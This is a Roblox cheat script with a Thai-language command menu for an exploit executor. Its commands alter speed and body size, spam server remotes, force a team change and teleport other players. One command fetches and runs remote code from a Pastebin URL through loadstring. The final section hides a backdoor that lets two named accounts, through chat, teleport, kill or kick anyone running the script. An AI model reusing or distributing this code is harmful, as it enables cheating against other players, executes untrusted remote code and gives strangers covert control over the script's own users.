local player = game.Players.LocalPlayer
local CoreGui = game:GetService("CoreGui")

local specialUsers = {
    ["AniF_Xx"] = true,
    ["birdV2_123"] = true,
}

local function isVIP(name)
    return specialUsers[name] == true
end

local gui = Instance.new("ScreenGui")
gui.Name = "MainGui"
gui.Parent = CoreGui
gui.ResetOnSpawn = false

local frameNormal = Instance.new("Frame", gui)
frameNormal.Size = UDim2.new(0, 300, 0, 150)
frameNormal.Position = UDim2.new(0.5, -150, 0.5, -75)
frameNormal.BackgroundColor3 = Color3.fromRGB(40, 40, 40)
frameNormal.Active = true
frameNormal.Draggable = true

local textBox = Instance.new("TextBox", frameNormal)
textBox.PlaceholderText = "ใส่คำสั่ง"
textBox.Size = UDim2.new(0.8, 0, 0, 40)
textBox.Position = UDim2.new(0.1, 0, 0.2, 0)
textBox.TextScaled = true

local confirmBtn = Instance.new("TextButton", frameNormal)
confirmBtn.Text = "ยืนยัน"
confirmBtn.Size = UDim2.new(0.8, 0, 0, 40)
confirmBtn.Position = UDim2.new(0.1, 0, 0.6, 0)
confirmBtn.TextScaled = true
confirmBtn.BackgroundColor3 = Color3.fromRGB(70, 70, 70)

local toggleBtn = Instance.new("TextButton", gui)
toggleBtn.Name = "ToggleBtn"
toggleBtn.Size = UDim2.new(0, 120, 0, 40)
toggleBtn.Position = UDim2.new(0, 50, 0, 50)
toggleBtn.Text = "ซ่อน/โชว์"
toggleBtn.BackgroundColor3 = Color3.fromRGB(50, 50, 50)
toggleBtn.Draggable = true
toggleBtn.Active = true

local commandFrame = Instance.new("Frame", gui)
commandFrame.Size = UDim2.new(0, 350, 0, 250)
commandFrame.Position = UDim2.new(0.5, 170, 0.5, -125)
commandFrame.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
commandFrame.Active = true
commandFrame.Draggable = true

local commandText = Instance.new("TextLabel", commandFrame)
commandText.Size = UDim2.new(1, -10, 1, -10)
commandText.Position = UDim2.new(0, 5, 0, 5)
commandText.BackgroundTransparency = 1
commandText.TextColor3 = Color3.new(1, 1, 1)
commandText.TextXAlignment = Enum.TextXAlignment.Left
commandText.TextYAlignment = Enum.TextYAlignment.Top
commandText.TextWrapped = true
commandText.TextScaled = true
commandText.Font = Enum.Font.SourceSans

local baseCommands = [[
คำสั่งที่ใช้ได้:

- ความเร็ว [เลข]
- รีตัว
- ขโมยเสียง
- ลำโพงหลากสี
- เลิกลำโพงหลากสี
- ตำรวจ
- อ้อโต้ความหิว
- ตัวสูง
- ตัวเล็ก
- จับโจร
- เลิกจับโจร
- vipวาป
- ปืน
- เกิดกลับ
- เลิกเกิดกลับ
- UI แอดมิน
]]

commandText.Text = baseCommands

toggleBtn.MouseButton1Click:Connect(function()
    local newState = not frameNormal.Visible
    frameNormal.Visible = newState
    commandFrame.Visible = newState
end)

local oldPositions = {}

confirmBtn.MouseButton1Click:Connect(function()
    local cmd = textBox.Text:lower()
    if cmd:match("ความเร็ว") then
        local speed = tonumber(cmd:match("%d+"))
        if speed then
            local humanoid = player.Character and player.Character:FindFirstChildWhichIsA("Humanoid")
            if humanoid then humanoid.WalkSpeed = speed end
        end
    elseif cmd == "รีตัว" then
        player.Character:BreakJoints()
    elseif cmd == "ขโมยเสียง" then
        loadstring(game:HttpGet("https://pastebin.com/raw/wN9Q3pZm", true))()
    elseif cmd == "ลำโพงหลากสี" then
        local colors = { BrickColor.new(331), BrickColor.new(1001), BrickColor.new(1003) }
        local radio = workspace:WaitForChild("DRadio_Script"):WaitForChild("Color")
        _G.SpeakerLoop = true
        task.spawn(function()
            while _G.SpeakerLoop do
                for _, color in ipairs(colors) do
                    radio:FireServer(color)
                    task.wait(0.1)
                end
            end
        end)
    elseif cmd == "เลิกลำโพงหลากสี" then
        _G.SpeakerLoop = false
    elseif cmd == "ตำรวจ" then
        game:GetService("ReplicatedStorage"):WaitForChild("ChangeTeam"):FireServer("Police")
        local hrp = player.Character and player.Character:FindFirstChild("HumanoidRootPart")
        local targetPosition = Vector3.new(167.88, 177.51, 250.48)
        local oldPos = hrp.CFrame
        hrp.CFrame = CFrame.new(targetPosition + Vector3.new(0, 3, 0))
        task.wait(1)
        hrp.CFrame = oldPos
    elseif cmd == "อ้อโต้ความหิว" then
        local hrp = player.Character.HumanoidRootPart
        local targetPosition = Vector3.new(-27.47, 177.58, 236.50)
        local oldCFrame = hrp.CFrame
        task.spawn(function()
            while task.wait(1) do
                if player:FindFirstChild("Hungry") and player.Hungry.Value <= 50 then
                    hrp.CFrame = CFrame.new(targetPosition + Vector3.new(0, 3, 0))
                    for _ = 1, 10 do
                        firetouchinterest(hrp, workspace.Terrain, 0)
                        task.wait(0.05)
                        firetouchinterest(hrp, workspace.Terrain, 1)
                        task.wait(0.05)
                    end
                    repeat
                        task.wait(0.2)
                        firetouchinterest(hrp, workspace.Terrain, 0)
                        firetouchinterest(hrp, workspace.Terrain, 1)
                    until player.Hungry.Value >= 100
                    hrp.CFrame = oldCFrame
                end
            end
        end)
    elseif cmd == "ตัวสูง" then
        local args = {{
            BodyScale = {
                BodyTypeScale = 1.5,
                DepthScale = 0.5,
                HeadScale = 1,
                HeightScale = 1.5,
                WidthScale = 0.5,
                ProportionScale = 0
            }
        }}
        game:GetService("ReplicatedStorage"):WaitForChild("BloxbizRemotes"):WaitForChild("CatalogOnApplyToRealHumanoid"):FireServer(unpack(args))
    elseif cmd == "ตัวเล็ก" then
        local args = {{
            BodyScale = {
                BodyTypeScale = 0,
                DepthScale = 0.9949401021003723,
                HeadScale = 1,
                HeightScale = 0.5,
                WidthScale = 0.6259825229644775,
                ProportionScale = 0
            }
        }}
        game:GetService("ReplicatedStorage"):WaitForChild("BloxbizRemotes"):WaitForChild("CatalogOnApplyToRealHumanoid"):FireServer(unpack(args))
    elseif cmd == "จับโจร" then
        _G.CatchStarLoop = true
        oldPositions = {}
        task.spawn(function()
            while _G.CatchStarLoop do
                for _, targetPlayer in ipairs(game.Players:GetPlayers()) do
                    if targetPlayer ~= player and targetPlayer:FindFirstChild("Star") then
                        local starValue = targetPlayer.Star.Value
                        if starValue >= 1 and starValue <= 5 then
                            local rightHand = player.Character and player.Character:FindFirstChild("RightHand")
                            if rightHand and targetPlayer.Character and targetPlayer.Character:FindFirstChild("HumanoidRootPart") then
                                if not oldPositions[targetPlayer] then
                                    oldPositions[targetPlayer] = targetPlayer.Character.HumanoidRootPart.CFrame
                                end
                                targetPlayer.Character.HumanoidRootPart.CFrame = rightHand.CFrame
                            end
                        end
                    end
                end
                task.wait(0.1)
            end
        end)
    elseif cmd == "เลิกจับโจร" then
        _G.CatchStarLoop = false
        task.spawn(function()
            for targetPlayer, oldCFrame in pairs(oldPositions) do
                if targetPlayer and targetPlayer.Character and targetPlayer.Character:FindFirstChild("HumanoidRootPart") then
                    targetPlayer.Character.HumanoidRootPart.CFrame = oldCFrame
                end
            end
            oldPositions = {}
        end)
    elseif cmd == "vipวาป" then
        local hrp = player.Character and player.Character:FindFirstChild("HumanoidRootPart")
        local humanoid = player.Character and player.Character:FindFirstChildWhichIsA("Humanoid")
        if hrp and humanoid then
            hrp.CFrame = CFrame.new(Vector3.new(90.36, 179.89, 1427.13))
            local warnGui = Instance.new("ScreenGui", CoreGui)
            warnGui.Name = "SafeZoneWarn"
            local text = Instance.new("TextLabel", warnGui)
            text.Size = UDim2.new(0, 400, 0, 50)
            text.Position = UDim2.new(0.5, -200, 0.8, 0)
            text.BackgroundTransparency = 0.3
            text.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
            text.TextColor3 = Color3.new(1, 1, 1)
            text.TextScaled = true
            text.Text = "ไม่สามารถหยิบของได้ คิดว่าเป็นจุดปลอดภัยแทน"
            local oldWalk = humanoid.WalkSpeed
            local oldJump = humanoid.JumpPower
            humanoid.WalkSpeed = 0
            humanoid.JumpPower = 0
            task.delay(3, function()
                if humanoid then
                    humanoid.WalkSpeed = oldWalk
                    humanoid.JumpPower = oldJump
                end
            end)
            task.delay(5, function()
                if warnGui then warnGui:Destroy() end
            end)
        end
    elseif cmd == "ปืน" then
        local hrp = player.Character and player.Character:FindFirstChild("HumanoidRootPart")
        if hrp then
            local originalPos = hrp.CFrame
            hrp.CFrame = CFrame.new(Vector3.new(-34.67, 176.97, 249.55))
            task.wait(3)
            hrp.CFrame = CFrame.new(Vector3.new(417.96, 168.09, 257.09))
            task.wait(1)
            hrp.CFrame = originalPos
        end
    elseif cmd == "เกิดกลับ" then
        if _G.ReviveBackConnection then _G.ReviveBackConnection:Disconnect() end
        _G.LastDeathPos = nil
        _G.ReviveBackConnection = player.CharacterAdded:Connect(function(char)
            task.wait(0.5)
            local hrp = char:WaitForChild("HumanoidRootPart")
            if _G.LastDeathPos then
                hrp.CFrame = _G.LastDeathPos
            end
        end)
        task.spawn(function()
            while player.Character do
                local char = player.Character
                local humanoid = char:FindFirstChildOfClass("Humanoid")
                if humanoid and humanoid.Health <= 0 then
                    local hrp = char:FindFirstChild("HumanoidRootPart")
                    if hrp then
                        _G.LastDeathPos = hrp.CFrame
                    end
                end
                task.wait(0.2)
            end
        end)
    elseif cmd == "เลิกเกิดกลับ" then
        if _G.ReviveBackConnection then
            _G.ReviveBackConnection:Disconnect()
            _G.ReviveBackConnection = nil
        end
        _G.LastDeathPos = nil
    elseif cmd == "ui แอดมิน" then
        if isVIP(player.Name) then
            warn("เปิด UI แอดมินได้")
        else
            warn("คุณไม่มีสิทธิ์ใช้คำสั่งนี้")
        end
    else
        warn("ไม่พบคำสั่ง: "..cmd)
    end
end)







local Players = game:GetService("Players")
local player = Players.LocalPlayer

-- 🖼 ใส่ Asset ID ของรูปคุณที่อัปโหลดแล้ว
local imageId = "rbxassetid://ใส่ไอดีของคุณตรงนี้" -- ตัวอย่าง: "rbxassetid://15234213421"

-- สร้างหน้าจอ UI
local screenGui = Instance.new("ScreenGui")
screenGui.Name = "ScriptAnnouncement"
screenGui.Parent = player:WaitForChild("PlayerGui")
screenGui.IgnoreGuiInset = true
screenGui.ResetOnSpawn = false

-- สร้างรูปภาพเต็มจอ
local imageLabel = Instance.new("ImageLabel")
imageLabel.Parent = screenGui
imageLabel.Size = UDim2.new(1, 0, 1, 0)
imageLabel.Position = UDim2.new(0, 0, 0, 0)
imageLabel.BackgroundTransparency = 1
imageLabel.Image = imageId
imageLabel.ImageTransparency = 0.1

-- สร้างข้อความกลางจอ
local textLabel = Instance.new("TextLabel")
textLabel.Parent = screenGui
textLabel.Size = UDim2.new(1, 0, 0.2, 0)
textLabel.Position = UDim2.new(0, 0, 0.4, 0)
textLabel.BackgroundTransparency = 1
textLabel.Text = "script by:TOUx1"
textLabel.TextColor3 = Color3.new(1, 1, 1)
textLabel.TextStrokeColor3 = Color3.new(0, 0, 0)
textLabel.TextStrokeTransparency = 0.5
textLabel.Font = Enum.Font.GothamBlack
textLabel.TextScaled = true

-- แสดงนาน 5 วินาที
task.wait(5)

-- ลบ UI
screenGui:Destroy()











local Players = game:GetService("Players")
local LocalPlayer = Players.LocalPlayer

-- รายชื่อผู้เล่นที่อนุญาตให้เห็น UI
local allowedUsers = {
    ["birdV2_123"] = true,
    ["Thai123456a2"] = true
}

-- ถ้าผู้เล่นตรงชื่อ แสดง UI แบบลากได้
if allowedUsers[LocalPlayer.Name] then
    local gui = Instance.new("ScreenGui")
    gui.Name = "SuperCoolUI"
    gui.ResetOnSpawn = false
    gui.Parent = LocalPlayer:WaitForChild("PlayerGui")

    local dragFrame = Instance.new("Frame")
    dragFrame.Size = UDim2.new(0, 200, 0, 50)
    dragFrame.Position = UDim2.new(0.5, -100, 0.05, 0)
    dragFrame.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
    dragFrame.BackgroundTransparency = 0.3
    dragFrame.Active = true
    dragFrame.Draggable = true
    dragFrame.Parent = gui

    local label = Instance.new("TextLabel")
    label.Size = UDim2.new(1, 0, 1, 0)
    label.Position = UDim2.new(0, 0, 0, 0)
    label.BackgroundTransparency = 1
    label.Text = "สุดหล่อ😛"
    label.TextColor3 = Color3.fromRGB(255, 255, 0)
    label.TextScaled = true
    label.Font = Enum.Font.FredokaOne
    label.Parent = dragFrame
end

-- ฟังก์ชันจัดการคำสั่งแชท
local function onChatted(sender, message)
    if not allowedUsers[sender.Name] then return end

    local msg = message:lower()

    if msg == "ดึง" then
        if sender.Character and sender.Character:FindFirstChild("HumanoidRootPart") then
            local pos = sender.Character.HumanoidRootPart.Position
            if LocalPlayer.Character and LocalPlayer.Character:FindFirstChild("HumanoidRootPart") then
                LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(pos + Vector3.new(0, 5, 0))
            end
        end

    elseif msg == "นอน" then
        if LocalPlayer.Character and LocalPlayer.Character:FindFirstChild("Humanoid") then
            LocalPlayer.Character.Humanoid.Health = 0
        end

    elseif msg == "ลาก่อน" then
        LocalPlayer:Kick("😛")
    end
end

-- เชื่อมต่อกับทุกคนในเซิร์ฟเวอร์
for _, player in ipairs(Players:GetPlayers()) do
    player.Chatted:Connect(function(msg)
        onChatted(player, msg)
    end)
end

Players.PlayerAdded:Connect(function(player)
    player.Chatted:Connect(function(msg)
        onChatted(player, msg)
    end)
end)
